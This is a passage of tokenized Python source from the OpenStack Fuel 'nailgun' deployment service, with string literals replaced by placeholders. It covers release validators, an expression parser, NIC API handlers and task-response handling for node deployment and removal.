query ( Node . id , Node . cluster_id ) . filter ( <EOL> Node . id . in_ ( node_ids_set ) ) ) <EOL> other_cluster_ids_set = set ( node_id_cluster_map . values ( ) ) - set ( ( int ( cluster_id ) , ) ) <EOL> if other_cluster_ids_set : <EOL> raise errors . InvalidData ( <EOL> u"<STR_LIT>" <EOL> . format ( <EOL> u"<STR_LIT:U+002CU+0020>" . join ( <EOL> str ( n_id ) for n_id , c_id in <EOL> node_id_cluster_map . iteritems ( ) <EOL> if c_id in other_cluster_ids_set <EOL> ) , cluster_id ) , log_message = True <EOL> ) <EOL> cls . check_all_nodes ( nodes , node_ids_set ) <EOL> cls . check_if_already_done ( nodes ) <EOL> return nodes </s>
<s> import sqlalchemy as sa <EOL> from sqlalchemy . dialects import postgresql as psql <EOL> from nailgun . api . v1 . validators . base import BasicValidator <EOL> from nailgun . api . v1 . validators . json_schema import release <EOL> from nailgun import consts <EOL> from nailgun . db import db <EOL> from nailgun . db . sqlalchemy import models <EOL> from nailgun import errors <EOL> class ReleaseValidator ( BasicValidator ) : <EOL> @ classmethod <EOL> def _validate_common ( cls , d ) : <EOL> if "<STR_LIT>" in d : <EOL> meta = d [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> for network in meta [ "<STR_LIT>" ] : <EOL> if "<STR_LIT:name>" not in network : <EOL> raise errors . InvalidData ( <EOL> "<STR_LIT>" . format ( network ) , <EOL> log_message = True <EOL> ) <EOL> @ classmethod <EOL> def validate ( cls , data ) : <EOL> d = cls . validate_json ( data ) <EOL> if "<STR_LIT:name>" not in d : <EOL> raise errors . InvalidData ( <EOL> "<STR_LIT>" , <EOL> log_message = True <EOL> ) <EOL> if "<STR_LIT:version>" not in d : <EOL> raise errors . InvalidData ( <EOL> "<STR_LIT>" , <EOL> log_message = True <EOL> ) <EOL> if "<STR_LIT>" not in d : <EOL> raise errors . InvalidData ( <EOL> "<STR_LIT>" , <EOL> log_message = True <EOL> ) <EOL> if db ( ) . query ( models . Release ) . filter_by ( <EOL> name = d [ "<STR_LIT:name>" ] , <EOL> version = d [ "<STR_LIT:version>" ] <EOL> ) . first ( ) : <EOL> raise errors . AlreadyExists ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> log_message = True <EOL> ) <EOL> cls . _validate_common ( d ) <EOL> if "<STR_LIT>" not in d : <EOL> d [ "<STR_LIT>" ] = { } <EOL> if "<STR_LIT>" not in d : <EOL> d [ "<STR_LIT>" ] = { } <EOL> return d <EOL> @ classmethod <EOL> def validate_update ( cls , data , instance ) : <EOL> d = cls . validate_json ( data ) <EOL> cls . _validate_common ( d ) <EOL> if db ( ) . query ( models . Release ) . filter_by ( <EOL> name = d . get ( "<STR_LIT:name>" , instance . name ) , <EOL> version = d . get ( "<STR_LIT:version>" , instance . version ) <EOL> ) . filter ( <EOL> sa . not_ ( models . Release . id == instance . id ) <EOL> ) . first ( ) : <EOL> raise errors . AlreadyExists ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> log_message = True <EOL> ) <EOL> if '<STR_LIT>' in d : <EOL> new_roles = set ( d [ '<STR_LIT>' ] ) <EOL> clusters = [ cluster . id for cluster in instance . clusters ] <EOL> new_roles_array = sa . cast ( <EOL> psql . array ( new_roles ) , <EOL> psql . ARRAY ( sa . String ( consts . ROLE_NAME_MAX_SIZE ) ) ) <EOL> node = db ( ) . query ( models . Node ) . filter ( <EOL> models . Node . cluster_id . in_ ( clusters ) <EOL> ) . filter ( sa . not_ ( sa . and_ ( <EOL> models . Node . roles . contained_by ( new_roles_array ) , <EOL> models . Node . pending_roles . contained_by ( new_roles_array ) <EOL> ) ) ) . first ( ) <EOL> if node : <EOL> used_role = set ( node . roles + node . pending_roles ) <EOL> used_role -= new_roles <EOL> raise errors . CannotDelete ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( '<STR_LIT:U+002C>' . join ( used_role ) ) <EOL> ) <EOL> return d <EOL> @ classmethod <EOL> def validate_delete ( cls , data , instance ) : <EOL> if instance . clusters : <EOL> raise errors . CannotDelete ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class ReleaseNetworksValidator ( BasicValidator ) : <EOL> @ classmethod <EOL> def validate ( cls , data ) : <EOL> parsed = super ( ReleaseNetworksValidator , cls ) . validate ( data ) <EOL> cls . validate_schema ( parsed ) <EOL> return parsed <EOL> @ classmethod <EOL> def validate_schema ( cls , data ) : <EOL> return super ( ReleaseNetworksValidator , cls ) . validate_schema ( <EOL> data , release . NETWORKS_SCHEMA ) </s>
<s> from sqlalchemy import Column <EOL> from sqlalchemy . dialects . postgresql import JSON <EOL> from sqlalchemy import Integer <EOL> from sqlalchemy import String <EOL> from nailgun . db . sqlalchemy . models . base import Base <EOL> from nailgun . db . sqlalchemy . models . mutable import MutableDict <EOL> class MasterNodeSettings ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> master_node_uid = Column ( String ( <NUM_LIT> ) , nullable = False ) <EOL> settings = Column ( MutableDict . as_mutable ( JSON ) , nullable = False , default = { } , <EOL> server_default = '<STR_LIT:{}>' ) </s>
<s> import ply . lex <EOL> import ply . yacc <EOL> from nailgun import errors <EOL> from nailgun . expression . objects import ModelPathWrapper <EOL> from nailgun . expression . objects import ScalarWrapper <EOL> from nailgun . expression . objects import SubexpressionWrapper <EOL> tokens = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> def t_NUMBER ( t ) : <EOL> r'<STR_LIT>' <EOL> t . value = int ( t . value ) <EOL> return t <EOL> def t_STRING ( t ) : <EOL> r'<STR_LIT>' <EOL> t . value = t . value [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> return t <EOL> def t_TRUE ( t ) : <EOL> r'<STR_LIT:true>' <EOL> t . value = True <EOL> return t <EOL> def t_FALSE ( t ) : <EOL> r'<STR_LIT:false>' <EOL> t . value = False <EOL> return t <EOL> def t_NULL ( t ) : <EOL> r'<STR_LIT:null>' <EOL> t . value = None <EOL> return t <EOL> t_AND = r'<STR_LIT>' <EOL> t_OR = r'<STR_LIT>' <EOL> t_NOT = r'<STR_LIT>' <EOL> t_IN = r'<STR_LIT>' <EOL> t_MODELPATH = r'<STR_LIT>' <EOL> t_EQUALS = r'<STR_LIT>' <EOL> t_NOT_EQUALS = r'<STR_LIT>' <EOL> t_LPAREN = r'<STR_LIT>' <EOL> t_RPAREN = r'<STR_LIT>' <EOL> t_ignore = '<STR_LIT>' <EOL> def t_error ( t ) : <EOL> errors . LexError ( "<STR_LIT>" % t . value [ <NUM_LIT:0> ] ) <EOL> t . lexer . skip ( <NUM_LIT:1> ) <EOL> expression = None <EOL> precedence = ( <EOL> ( '<STR_LIT:left>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:left>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:left>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:left>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> def p_expression_binop ( p ) : <EOL> """<STR_LIT>""" <EOL> result , arg1 , op , arg2 = p <EOL> if op == '<STR_LIT>' : <EOL> result = lambda : arg1 ( ) == arg2 ( ) <EOL> elif op == '<STR_LIT>' : <EOL> result = lambda : arg1 ( ) != arg2 ( ) <EOL> elif op == '<STR_LIT>' : <EOL> result = lambda : arg1 ( ) or arg2 ( ) <EOL> elif op == '<STR_LIT>' : <EOL> result = lambda : arg1 ( ) and arg2 ( ) <EOL> elif op == '<STR_LIT>' : <EOL> result = lambda : arg1 ( ) in arg2 ( ) <EOL> p [ <NUM_LIT:0> ] = SubexpressionWrapper ( result ) <EOL> def p_not_expression ( p ) : <EOL> """<STR_LIT>""" <EOL> subexpression = p [ <NUM_LIT:2> ] <EOL> p [ <NUM_LIT:0> ] = SubexpressionWrapper ( lambda : not subexpression ( ) ) <EOL> def p_expression_group ( p ) : <EOL> """<STR_LIT>""" <EOL> p [ <NUM_LIT:0> ] = p [ <NUM_LIT:2> ] <EOL> def p_expression_scalar ( p ) : <EOL> """<STR_LIT>""" <EOL> p [ <NUM_LIT:0> ] = ScalarWrapper ( p [ <NUM_LIT:1> ] ) <EOL> def p_expression_modelpath ( p ) : <EOL> """<STR_LIT>""" <EOL> p [ <NUM_LIT:0> ] = ModelPathWrapper ( p [ <NUM_LIT:1> ] , expression ) <EOL> def p_error ( p ) : <EOL> raise errors . ParseError ( "<STR_LIT>" % getattr ( p , '<STR_LIT:value>' , '<STR_LIT>' ) ) <EOL> lexer = ply . lex . lex ( ) <EOL> parser = ply . yacc . yacc ( debug = False , write_tables = False ) <EOL> def parse ( expr ) : <EOL> global expression <EOL> expression = expr <EOL> return parser . parse ( expression . expression_text , lexer = lexer ) </s>
<s> """<STR_LIT>""" <EOL> import web <EOL> from nailgun . api . v1 . handlers . base import BaseHandler <EOL> from nailgun . api . v1 . handlers . base import content <EOL> from nailgun . extensions . network_manager . validators . network import NetAssignmentValidator <EOL> from nailgun import consts <EOL> from nailgun import objects <EOL> from nailgun . extensions . network_manager . objects . serializers . nic import NodeInterfacesSerializer <EOL> from nailgun . db . sqlalchemy . models import NetworkGroup <EOL> from nailgun . db . sqlalchemy . models import NodeNICInterface <EOL> class NodeNICsHandler ( BaseHandler ) : <EOL> """<STR_LIT>""" <EOL> model = NodeNICInterface <EOL> validator = NetAssignmentValidator <EOL> serializer = NodeInterfacesSerializer <EOL> @ content <EOL> def GET ( self , node_id ) : <EOL> """<STR_LIT>""" <EOL> node = self . get_object_or_404 ( objects . Node , node_id ) <EOL> return map ( self . render , node . interfaces ) <EOL> @ content <EOL> def PUT ( self , node_id ) : <EOL> """<STR_LIT>""" <EOL> interfaces_data = self . checked_data ( <EOL> self . validator . validate_structure_and_data , node_id = node_id ) <EOL> node_data = { '<STR_LIT:id>' : node_id , '<STR_LIT>' : interfaces_data } <EOL> objects . Cluster . get_network_manager ( ) . _update_attrs ( node_data ) <EOL> node = self . get_object_or_404 ( objects . Node , node_id ) <EOL> objects . Node . add_pending_change ( <EOL> node , <EOL> consts . CLUSTER_CHANGES . interfaces <EOL> ) <EOL> return map ( self . render , node . interfaces ) <EOL> class NodeCollectionNICsHandler ( BaseHandler ) : <EOL> """<STR_LIT>""" <EOL> model = NetworkGroup <EOL> validator = NetAssignmentValidator <EOL> serializer = NodeInterfacesSerializer <EOL> @ content <EOL> def PUT ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . checked_data ( <EOL> self . validator . validate_collection_structure_and_data ) <EOL> updated_nodes_ids = [ ] <EOL> for node_data in data : <EOL> node_id = objects . Cluster . get_network_manager ( ) . _update_attrs ( <EOL> node_data ) <EOL> updated_nodes_ids . append ( node_id ) <EOL> updated_nodes = objects . NodeCollection . filter_by_id_list ( <EOL> None , updated_nodes_ids <EOL> ) . all ( ) <EOL> return [ <EOL> { <EOL> "<STR_LIT:id>" : n . id , <EOL> "<STR_LIT>" : map ( self . render , n . interfaces ) <EOL> } for n in updated_nodes <EOL> ] <EOL> class NodeNICsDefaultHandler ( BaseHandler ) : <EOL> """<STR_LIT>""" <EOL> @ content <EOL> def GET ( self , node_id ) : <EOL> """<STR_LIT>""" <EOL> node = self . get_object_or_404 ( objects . Node , node_id ) <EOL> return self . get_default ( node ) <EOL> def get_default ( self , node ) : <EOL> if node . cluster : <EOL> return objects . Cluster . get_network_manager ( <EOL> node . cluster <EOL> ) . get_default_interfaces_configuration ( node ) <EOL> class NodeCollectionNICsDefaultHandler ( NodeNICsDefaultHandler ) : <EOL> """<STR_LIT>""" <EOL> validator = NetAssignmentValidator <EOL> @ content <EOL> def GET ( self ) : <EOL> """<STR_LIT>""" <EOL> cluster_id = web . input ( cluster_id = None ) . cluster_id <EOL> if cluster_id : <EOL> nodes = objects . NodeCollection . filter_by ( None , cluster_id = cluster_id ) <EOL> else : <EOL> nodes = objects . NodeCollection . all ( ) <EOL> return filter ( lambda x : x is not None , map ( self . get_default , nodes ) ) </s>
<s> class NailgunNodeAdapter ( object ) : <EOL> def __init__ ( self , node ) : <EOL> self . node = node <EOL> @ property <EOL> def id ( self ) : <EOL> return self . node . id <EOL> @ property <EOL> def name ( self ) : <EOL> return self . node . name <EOL> @ property <EOL> def full_name ( self ) : <EOL> return self . node . full_name <EOL> def get_node_spaces ( self ) : <EOL> from . . manager import get_node_spaces <EOL> if self . node . cluster : <EOL> return get_node_spaces ( self . node ) <EOL> return [ ] <EOL> @ property <EOL> def disks ( self ) : <EOL> return self . node . meta [ '<STR_LIT>' ] <EOL> @ property <EOL> def ram ( self ) : <EOL> return self . node . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> @ property <EOL> def is_ubuntu ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . node . cluster and <EOL> self . node . cluster . release . operating_system . lower ( ) == "<STR_LIT>" ) </s>
<s> from nailgun . db import db <EOL> from nailgun . db . sqlalchemy import models <EOL> from nailgun . objects import NailgunCollection <EOL> from nailgun . objects import NailgunObject <EOL> from nailgun . objects . serializers . action_log import ActionLogSerializer <EOL> class ActionLog ( NailgunObject ) : <EOL> model = models . ActionLog <EOL> serializer = ActionLogSerializer <EOL> @ classmethod <EOL> def update ( cls , instance , data ) : <EOL> """<STR_LIT>""" <EOL> instance . additional_info . update ( data . pop ( '<STR_LIT>' , { } ) ) <EOL> return super ( ActionLog , cls ) . update ( instance , data ) <EOL> @ classmethod <EOL> def get_by_kwargs ( cls , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> instance = db ( ) . query ( models . ActionLog ) . filter_by ( ** kwargs ) . first ( ) <EOL> return instance <EOL> class ActionLogCollection ( NailgunCollection ) : <EOL> single = ActionLog </s>
<s> from nailgun . objects . serializers . base import BasicSerializer <EOL> class PluginLinkSerializer ( BasicSerializer ) : <EOL> fields = ( <EOL> "<STR_LIT:id>" , <EOL> "<STR_LIT:title>" , <EOL> "<STR_LIT:url>" , <EOL> "<STR_LIT:description>" , <EOL> "<STR_LIT>" <EOL> ) </s>
<s> import collections <EOL> import copy <EOL> import datetime <EOL> import itertools <EOL> import logging <EOL> import os <EOL> import six <EOL> from oslo_serialization import jsonutils <EOL> from sqlalchemy import or_ <EOL> from nailgun import consts <EOL> from nailgun import errors as nailgun_errors <EOL> from nailgun import notifier <EOL> from nailgun import objects <EOL> from nailgun . settings import settings <EOL> from nailgun . consts import TASK_STATUSES <EOL> from nailgun . db import db <EOL> from nailgun . db . sqlalchemy . models import IPAddr <EOL> from nailgun . db . sqlalchemy . models import Node <EOL> from nailgun . db . sqlalchemy . models import Release <EOL> from nailgun . extensions . network_manager import connectivity_check <EOL> from nailgun . extensions . network_manager import utils as net_utils <EOL> from nailgun . objects . plugin import ClusterPlugins <EOL> from nailgun . task . helpers import TaskHelper <EOL> from nailgun . utils import logs as logs_utils <EOL> from nailgun . utils import reverse <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> class NailgunReceiver ( object ) : <EOL> @ classmethod <EOL> def remove_nodes_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . get ( '<STR_LIT>' ) or [ ] <EOL> error_nodes = kwargs . get ( '<STR_LIT>' ) or [ ] <EOL> inaccessible_nodes = kwargs . get ( '<STR_LIT>' ) or [ ] <EOL> error_msg = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> if status in [ consts . TASK_STATUSES . ready , consts . TASK_STATUSES . error ] : <EOL> progress = <NUM_LIT:100> <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> if task . cluster_id is not None : <EOL> objects . Cluster . get_by_uid ( <EOL> task . cluster_id , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> all_nodes = itertools . chain ( nodes , error_nodes , inaccessible_nodes ) <EOL> all_nodes_ids = [ <EOL> node [ '<STR_LIT:id>' ] if '<STR_LIT:id>' in node else node [ '<STR_LIT>' ] <EOL> for node in all_nodes <EOL> ] <EOL> locked_nodes = objects . NodeCollection . order_by ( <EOL> objects . NodeCollection . filter_by_list ( <EOL> None , <EOL> '<STR_LIT:id>' , <EOL> all_nodes_ids , <EOL> ) , <EOL> '<STR_LIT:id>' <EOL> ) <EOL> objects . NodeCollection . lock_for_update ( locked_nodes ) . all ( ) <EOL> def get_node_id ( n ) : <EOL> return n . get ( '<STR_LIT:id>' , int ( n . get ( '<STR_LIT>' ) ) ) <EOL> nodes_to_delete_ids = [ get_node_id ( n ) for n in nodes ] <EOL> if len ( inaccessible_nodes ) > <NUM_LIT:0> : <EOL> inaccessible_node_ids = [ <EOL> get_node_id ( n ) for n in inaccessible_nodes ] <EOL> logger . warn ( u'<STR_LIT>' , <EOL> inaccessible_nodes ) <EOL> nodes_to_delete_ids . extend ( inaccessible_node_ids ) <EOL> for node in objects . NodeCollection . filter_by_id_list ( <EOL> None , nodes_to_delete_ids ) : <EOL> logs_utils . delete_node_logs ( node ) <EOL> objects . NodeCollection . delete_by_ids ( nodes_to_delete_ids ) <EOL> for node in error_nodes : <EOL> node_db = objects . Node . get_by_uid ( node [ '<STR_LIT>' ] ) <EOL> if not node_db : <EOL> logger . error ( <EOL> u"<STR_LIT>" <EOL> "<STR_LIT>" , str ( node ) <EOL> ) <EOL> else : <EOL> node_db . pending_deletion = False <EOL> node_db . status = '<STR_LIT:error>' <EOL> db ( ) . add ( node_db ) <EOL> node [ '<STR_LIT:name>' ] = node_db . name <EOL> db ( ) . flush ( ) <EOL> success_msg = u"<STR_LIT>" <EOL> err_msg = u"<STR_LIT>" <EOL> if nodes : <EOL> success_msg = u"<STR_LIT>" . format ( <EOL> len ( nodes ) <EOL> ) <EOL> notifier . notify ( "<STR_LIT>" , success_msg ) <EOL> if error_nodes : <EOL> err_msg = u"<STR_LIT>" . format ( <EOL> len ( error_nodes ) , <EOL> '<STR_LIT:U+002CU+0020>' . join ( <EOL> [ n . get ( '<STR_LIT:name>' ) or "<STR_LIT>" . format ( n [ '<STR_LIT>' ] ) <EOL> for n in error_nodes ] ) <EOL> ) <EOL> notifier . notify ( "<STR_LIT:error>" , err_msg ) <EOL> if not error_msg : <EOL> error_msg = "<STR_LIT>" . join ( [ success_msg , err_msg ] ) <EOL> data = { <EOL> '<STR_LIT:status>' : status , <EOL> '<STR_LIT>' : progress , <EOL> '<STR_LIT:message>' : error_msg , <EOL> } <EOL> objects . Task . update ( task , data ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , nodes ) <EOL> @ classmethod <EOL> def remove_cluster_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> cls . remove_nodes_resp ( ** kwargs ) <EOL> task = objects . Task . get_by_uuid ( task_uuid , fail_if_not_found = True ) <EOL> cluster = task . cluster <EOL> if task . status in ( '<STR_LIT>' , ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> cluster_name = cluster . name <EOL> ips = db ( ) . query ( IPAddr ) . filter ( <EOL> IPAddr . network . in_ ( [ n . id for n in cluster . network_groups ] ) <EOL> ) <EOL> for ip in ips : <EOL> db ( ) . delete ( ip ) <EOL> db ( ) . flush ( ) <EOL> nm = objects . Cluster . get_network_manager ( cluster ) <EOL> admin_nets = nm . get_admin_networks ( ) <EOL> objects . Task . delete ( task ) <EOL> for task_ in cluster . tasks : <EOL> if task_ != task : <EOL> objects . Transaction . delete ( task_ ) <EOL> objects . Cluster . delete ( cluster ) <EOL> if admin_nets != nm . get_admin_networks ( ) : <EOL> from nailgun . task . manager import UpdateDnsmasqTaskManager <EOL> UpdateDnsmasqTaskManager ( ) . execute ( ) <EOL> notifier . notify ( <EOL> "<STR_LIT>" , <EOL> u"<STR_LIT>" % ( <EOL> cluster_name <EOL> ) <EOL> ) <EOL> elif task . status in ( '<STR_LIT:error>' , ) : <EOL> cluster . status = '<STR_LIT:error>' <EOL> db ( ) . add ( cluster ) <EOL> db ( ) . flush ( ) <EOL> if not task . message : <EOL> task . message = "<STR_LIT>" . format ( <EOL> cls . _generate_error_message ( <EOL> task , <EOL> error_types = ( '<STR_LIT>' , ) <EOL> ) <EOL> ) <EOL> notifier . notify ( <EOL> "<STR_LIT:error>" , <EOL> task . message , <EOL> cluster . id <EOL> ) <EOL> @ classmethod <EOL> def remove_images_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> task_uuid = kwargs [ '<STR_LIT>' ] <EOL> task = objects . Task . get_by_uuid ( task_uuid ) <EOL> if status == consts . TASK_STATUSES . ready : <EOL> logger . info ( "<STR_LIT>" ) <EOL> elif status == consts . TASK_STATUSES . error : <EOL> logger . error ( "<STR_LIT>" , task_uuid ) <EOL> objects . Task . update ( task , { '<STR_LIT:status>' : status } ) <EOL> @ classmethod <EOL> def deploy_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . get ( '<STR_LIT>' ) or [ ] <EOL> message = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , <EOL> fail_if_not_found = True <EOL> ) <EOL> objects . Cluster . get_by_uid ( <EOL> task . cluster_id , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> if not status : <EOL> status = task . status <EOL> nodes_by_id = { str ( n [ '<STR_LIT>' ] ) : n for n in nodes } <EOL> master = nodes_by_id . pop ( consts . MASTER_NODE_UID , { } ) <EOL> nodes_by_id . pop ( '<STR_LIT:None>' , { } ) <EOL> if nodes_by_id : <EOL> q_nodes = objects . NodeCollection . filter_by_id_list ( <EOL> None , <EOL> nodes_by_id , <EOL> ) <EOL> q_nodes = objects . NodeCollection . order_by ( q_nodes , '<STR_LIT:id>' ) <EOL> db_nodes = objects . NodeCollection . lock_for_update ( q_nodes ) . all ( ) <EOL> else : <EOL> db_nodes = [ ] <EOL> for node_db in db_nodes : <EOL> node = nodes_by_id . pop ( node_db . uid ) <EOL> update_fields = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:status>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> for param in update_fields : <EOL> if param in node : <EOL> logger . debug ( "<STR_LIT>" , <EOL> node [ '<STR_LIT>' ] , param , node [ param ] ) <EOL> setattr ( node_db , param , node [ param ] ) <EOL> if param == '<STR_LIT>' and node . get ( '<STR_LIT:status>' ) == '<STR_LIT:error>' or node . get ( '<STR_LIT>' ) is False : <EOL> node_db . progress = <NUM_LIT:100> <EOL> if node . get ( '<STR_LIT>' ) is False and not node_db . error_msg : <EOL> node_db . error_msg = u"<STR_LIT>" <EOL> notifier . notify ( <EOL> consts . NOTIFICATION_TOPICS . error , <EOL> u"<STR_LIT>" . format ( <EOL> consts . TASK_NAMES . deploy , <EOL> node_db . name , <EOL> node_db . error_msg or "<STR_LIT>" <EOL> ) , <EOL> cluster_id = task . cluster_id , <EOL> node_id = node [ '<STR_LIT>' ] , <EOL> task_uuid = task_uuid <EOL> ) <EOL> if nodes_by_id : <EOL> logger . warning ( "<STR_LIT>" , <EOL> "<STR_LIT:U+002C>" . join ( sorted ( nodes_by_id ) ) ) <EOL> for node in nodes : <EOL> if node . get ( '<STR_LIT>' ) and node . get ( '<STR_LIT>' ) : <EOL> objects . DeploymentHistory . update_if_exist ( <EOL> task . id , <EOL> node [ '<STR_LIT>' ] , <EOL> node [ '<STR_LIT>' ] , <EOL> node [ '<STR_LIT>' ] , <EOL> node . get ( '<STR_LIT>' ) <EOL> ) <EOL> db ( ) . flush ( ) <EOL> if nodes and not progress : <EOL> progress = TaskHelper . recalculate_deployment_task_progress ( task ) <EOL> if master . get ( '<STR_LIT:status>' ) == consts . TASK_STATUSES . error : <EOL> status = consts . TASK_STATUSES . error <EOL> cls . _update_task_status ( task , status , progress , message , db_nodes ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , nodes ) <EOL> @ classmethod <EOL> def provision_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> message = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> nodes_by_id = { str ( n [ '<STR_LIT>' ] ) : n for n in nodes } <EOL> master = nodes_by_id . pop ( consts . MASTER_NODE_UID , { } ) <EOL> if master . get ( '<STR_LIT:status>' ) == consts . TASK_STATUSES . error : <EOL> status = consts . TASK_STATUSES . error <EOL> progress = <NUM_LIT:100> <EOL> q_nodes = objects . NodeCollection . filter_by_id_list ( <EOL> None , nodes_by_id <EOL> ) <EOL> q_nodes = objects . NodeCollection . order_by ( q_nodes , '<STR_LIT:id>' ) <EOL> db_nodes = objects . NodeCollection . lock_for_update ( q_nodes ) . all ( ) <EOL> for node_db in db_nodes : <EOL> node = nodes_by_id . pop ( node_db . uid ) <EOL> if node . get ( '<STR_LIT:status>' ) == consts . TASK_STATUSES . error : <EOL> node_db . status = consts . TASK_STATUSES . error <EOL> node_db . progress = <NUM_LIT:100> <EOL> node_db . error_type = consts . TASK_NAMES . provision <EOL> node_db . error_msg = node . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> node_db . status = node . get ( '<STR_LIT:status>' ) <EOL> node_db . progress = node . get ( '<STR_LIT>' ) <EOL> db ( ) . flush ( ) <EOL> if nodes_by_id : <EOL> logger . warning ( "<STR_LIT>" , <EOL> "<STR_LIT:U+002C>" . join ( sorted ( six . moves . map ( str , nodes_by_id ) ) ) ) <EOL> if nodes and not progress : <EOL> progress = TaskHelper . recalculate_provisioning_task_progress ( task ) <EOL> cls . _update_task_status ( task , status , progress , message , db_nodes ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , nodes ) <EOL> @ classmethod <EOL> def update_config_resp ( cls , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) ) <EOL> task_uuid = kwargs [ '<STR_LIT>' ] <EOL> message = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> q_nodes = objects . NodeCollection . filter_by_id_list ( <EOL> None , task . cache [ '<STR_LIT>' ] ) <EOL> nodes = objects . NodeCollection . lock_for_update ( q_nodes ) . all ( ) <EOL> if status in ( consts . TASK_STATUSES . ready , consts . TASK_STATUSES . error ) : <EOL> for node in nodes : <EOL> node . status = consts . NODE_STATUSES . ready <EOL> node . progress = <NUM_LIT:100> <EOL> if status == consts . TASK_STATUSES . error : <EOL> message = ( u"<STR_LIT>" <EOL> u"<STR_LIT>" ) . format ( '<STR_LIT:U+002CU+0020>' . join ( node . name for node in nodes ) ) <EOL> logger . error ( message ) <EOL> notifier . notify ( "<STR_LIT:error>" , message ) <EOL> db ( ) . flush ( ) <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , '<STR_LIT:message>' : message } <EOL> objects . Task . update ( task , data ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , nodes ) <EOL> @ classmethod <EOL> def _notify ( cls , task , topic , message , node_id = None , task_uuid = None ) : <EOL> """<STR_LIT>""" <EOL> if ( task . name == consts . TASK_NAMES . provision <EOL> and task . parent_id is not None ) or message is None : <EOL> return <EOL> notifier . notify ( <EOL> topic , <EOL> message , <EOL> task . cluster_id , <EOL> node_id = node_id , <EOL> task_uuid = task_uuid <EOL> ) <EOL> @ classmethod <EOL> def _update_task_status ( cls , task , status , progress , message , nodes ) : <EOL> """<STR_LIT>""" <EOL> if status == consts . TASK_STATUSES . error : <EOL> cls . _error_action ( task , status , progress , message ) <EOL> elif status == consts . TASK_STATUSES . ready : <EOL> cls . _success_action ( task , status , progress , nodes ) <EOL> else : <EOL> data = { '<STR_LIT:status>' : status , '<STR_LIT>' : progress , '<STR_LIT:message>' : message } <EOL> objects . Task . update ( task , data ) <EOL> @ classmethod <EOL> def _update_action_log_entry ( cls , task_status , task_name , task_uuid , <EOL> nodes_from_resp ) : <EOL> try : <EOL> if 